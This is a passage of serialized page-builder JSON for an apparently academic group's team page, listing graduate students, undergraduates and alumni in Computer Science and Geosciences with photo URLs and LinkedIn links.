Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c189\",\"index\":1,\"id\":\"182-c194\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Ardavan.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":863,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassini\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c81\",\"index\":3,\"id\":\"182-c85\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Basit-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":838,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c87\",\"index\":3,\"id\":\"182-c91\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/sara-edwards1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1399,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sara Edwards<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sara-edwards-691b8331\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-cropped-Ryan-e1649958770354.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1050,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ryan Garland<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ryan-g-aa71a0163\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c99\",\"index\":1,\"id\":\"182-c104\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c105\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Jean.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1094,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c105\",\"index\":0,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c105\",\"index\":2,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c105\",\"index\":3,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c110\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c111\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Angelique.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":874,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c112\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Angelique Willis\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c110\",\"index\":2,\"id\":\"182-c113\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Master\'s student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c110\",\"index\":3,\"id\":\"182-c114\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/angelique-willis\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c110\",\"index\":1,\"id\":\"182-c115\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c116\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c117\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/11\\/bayo-e1695781168350.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1369,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c116\",\"index\":0,\"id\":\"182-c118\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sikiru Bayo Abdulkareem\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c116\",\"index\":2,\"id\":\"182-c119\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Master\'s student<\\/span><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c116\",\"index\":3,\"id\":\"182-c120\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"www.linkedin.com\\/in\\/bayonle\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c116\",\"index\":1,\"id\":\"182-c121\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"182-c83\"}],\"styleRef\":848,\"type\":\"content\"}],\"id\":\"182-c62\",\"parentId\":\"182-c61\",\"partialId\":182,\"styleRef\":847,\"type\":\"content\"}],\"id\":\"182-c61\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Graduates\"},\"id\":\"182-c124\",\"parentId\":\"182-c123\",\"partialId\":182,\"styleRef\":862,\"type\":\"content\"}],\"id\":\"182-c123\",\"parentId\":\"182-c122\",\"partialId\":182,\"styleRef\":861,\"type\":\"content\"}],\"id\":\"182-c122\",\"parentId\":\"182-c61\",\"partialId\":182,\"styleRef\":860,\"type\":\"content\"}]},\"styleRef\":846,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Undergrads\",\"attrs\":{\"id\":\"undergrads-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c127\",\"parentId\":\"182-c126\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c127\",\"index\":0,\"id\":\"182-c128\",\"partialId\":182,\"styleRef\":831,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1417,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c127\",\"index\":0,\"id\":\"182-c129\",\"partialId\":182,\"styleRef\":832,\"type\":\"content\",\"props\":{\"content\":\"Joshua Quiroz<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c127\",\"index\":2,\"id\":\"182-c130\",\"partialId\":182,\"styleRef\":833,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/joshua-quiroz-315713215\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c127\",\"index\":1,\"id\":\"182-c131\",\"partialId\":182,\"styleRef\":835,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":830,\"type\":\"content\"}],\"id\":\"182-c126\",\"parentId\":\"182-c125\",\"partialId\":182,\"styleRef\":829,\"type\":\"content\"}],\"id\":\"182-c125\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Undergraduates\"},\"id\":\"182-c134\",\"parentId\":\"182-c133\",\"partialId\":182,\"styleRef\":844,\"type\":\"content\"}],\"id\":\"182-c133\",\"parentId\":\"182-c132\",\"partialId\":182,\"styleRef\":843,\"type\":\"content\"}],\"id\":\"182-c132\",\"parentId\":\"182-c125\",\"partialId\":182,\"styleRef\":842,\"type\":\"content\"}]},\"styleRef\":828,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Alumni\",\"attrs\":{\"id\":\"alumni\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c137\",\"parentId\":\"182-c136\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c137\",\"index\":0,\"id\":\"182-c138\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Sarah_Akinola-scaled-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1595,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c137\",\"index\":0,\"id\":\"182-c139\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sarah Akinola\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c137\",\"index\":2,\"id\":\"182-c140\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/akinola-sarah-035789138\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c137\",\"index\":1,\"id\":\"182-c141\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c142\",\"parentId\":\"182-c136\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c142\",\"index\":0,\"id\":\"182-c143\",\"partialId\":182,\"styleRef\":918,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Anvith.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1597,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c142\",\"index\":0,\"id\":\"182-c144\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Anvith Anand\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c142\",\"index\":2,\"id\":\"182-c145\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anvith-anand\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c142\",\"index\":1,\"id\":\"182-c146\",\"partialId\":182,\"styleRef\":919,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c147\",\"parentId\":\"182-c136\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c147\",\"index\":0,\"id\":\"182-c148\",\"partialId\":182,\"styleRef\":920,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Alex.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":884,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c147\",\"index\":0,\"id\":\"182-c149\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Alex Asige\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c147\",\"index\":2,\"id\":\"182-c150\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/twitter\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/twitter.com\\/i\\/flow\\/login?redirect_after_login=%2FAsigeAlex\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c147\",\"index\":1,\"id\":\"182-c151\",\"partialId\":182,\"styleRef\":921,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c152\",\"parentId\":\"182-c136\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c152\",\"index\":0,\"id\":\"182-c153\",\"partialId\":182,\"styleRef\":922,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bhavya-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":776,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c152\",\"index\":0,\"id\":\"182-c154\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bhavya Busireddy\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c152\",\"index\":2,\"id\":\"182-c155\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bhavya-busireddy-b052b192\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c152\",\"index\":1,\"id\":\"182-c156\",\"partialId\":182,\"styleRef\":923,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c157\",\"parentId\":\"182-c136\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c157\",\"index\":0,\"id\":\"182-c158\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Vineeth.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":831,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c157\",\"index\":0,\"id\":\"182-c159\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Vineeth Kumar Chandha\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c157\",\"index\":2,\"id\":\"182-c160\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/vineeth-kumar-chandha-207611149\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c157\",\"index\":1,\"id\":\"182-c161\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c162\",\"parentId\":\"182-c136\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c162\",\"index\":0,\"id\":\"182-c163\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-sathwik-2-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1007,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c162\",\"index\":0,\"id\":\"182-c164\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sathwik Chowda\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c162\",\"index\":2,\"id\":\"182-c165\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sathwikchowda\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c162\",\"index\":1,\"id\":\"182-c166\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c167\",\"parentId\":\"182-c136\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c167\",\"index\":0,\"id\":\"182-c168\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Brindal-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1599,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c167\",\"index\":0,\"id\":\"182-c169\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Brindal Dhol\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c167\",\"index\":2,\"id\":\"182-c170\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/brindaldhol\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c167\",\"index\":1,\"id\":\"182-c171\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c172\",\"parentId\":\"182-c136\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c172\",\"index\":0,\"id\":\"182-c173\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-ruby_parcells-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":853,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c172\",\"index\":0,\"id\":\"182-c174\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Ruby Parcells\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c172\",\"index\":2,\"id\":\"182-c175\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<br><\\/p>\"},\"domuuid\":\"182-c259\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c176\",\"parentId\":\"182-c136\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c176\",\"index\":0,\"id\":\"182-c177\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Reshmanjali-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1600,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c176\",\"index\":0,\"id\":\"182-c178\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Sai Reshmanjali\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c176\",\"index\":2,\"id\":\"182-c179\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\\\">Computer Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c176\",\"index\":1,\"id\":\"182-c180\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c181\",\"parentId\":\"182-c136\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c181\",\"index\":0,\"id\":\"182-c182\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bronson.png\",\"caption\":{\"text\":\"\"},\"imageId\":817,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c181\",\"index\":0,\"id\":\"182-c183\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"c